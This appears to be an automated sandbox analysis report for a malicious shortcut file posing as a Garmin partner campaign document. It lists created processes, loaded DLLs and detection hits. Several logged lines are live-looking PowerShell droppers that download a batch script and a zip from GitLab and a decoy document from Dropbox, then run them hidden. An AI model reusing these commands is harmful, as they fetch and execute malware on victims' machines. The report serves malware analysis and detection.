Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqxc2osv.efi.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p"

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk

ReversingLabs: Detection: 20%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Updates.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp.com 437
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\AppData\Local\Temp\Updates.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\AppData\Local\Temp\Updates.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\AppData\Local\Temp\Updates.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\AppData\Local\Temp\Updates.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Updates.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp.com 437	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\AppData\Local\Temp\Updates.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\AppData\Local\Temp\Updates.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\AppData\Local\Temp\Updates.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\AppData\Local\Temp\Updates.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 0000000F.00000002.2243104134.00000210F3F66000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F418C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F418C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Yn.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F418C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2243424451.00000210F3FCB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F4176000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F4176000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 0000000F.00000002.2243795126.00000210F418C000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected Abobus Obfuscator

Source: Yara match	File source: 00000004.00000003.2169984727.000001E801303000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Updates.bat, type: DROPPED

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"
